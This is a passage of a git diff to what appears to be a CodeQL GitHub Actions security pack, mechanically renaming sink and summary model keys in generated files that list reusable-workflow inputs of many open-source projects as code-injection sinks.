6d6f9e17740..b7c00fff318 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262f..5a129691bc5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b..bd07156d06b 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec22..b029e341710 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a9..995e692e494 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0a..db325a06baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255..2c91ab62b0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728..8fdf39a0bbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a9..00fceb9c7bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bf..a6b947dfbce 100644 
--- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57..9359ea482c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9..023666e67ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb..7005b7dd7c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3a..8b73f89401a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c9..3cf43b814db 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd1..d33e308c7eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9..5c1de93f08a 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec76..aab9fa502cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c1..b58fff831e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf13..f96264fbf42 100644 
--- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a9..6aaf6aa2783 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e..d246f4ce644 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141..a35a1a628e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b5..ec22645570f 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c..e0eccb26a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e15..5f85bb1a91a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f63..7f1af324260 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a..b06b390e718 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce8..d5746b566cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a278..fbe9e286d2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d310079..6ba2fc75375 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a..6d522b776dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c36..c210f350439 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b62..81eeb82033c 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d..6d81f2ff242 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cff..b7ea7250825 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c04336..972b6f15baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c6..07f0c5c0f69 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e..6bbf33e7f89 100644 
--- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ff..165965dd568 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a..3d1e182458e 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a38973..689cc91871a 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581..0481c04cb67 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d8..8c0c944a393 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml 
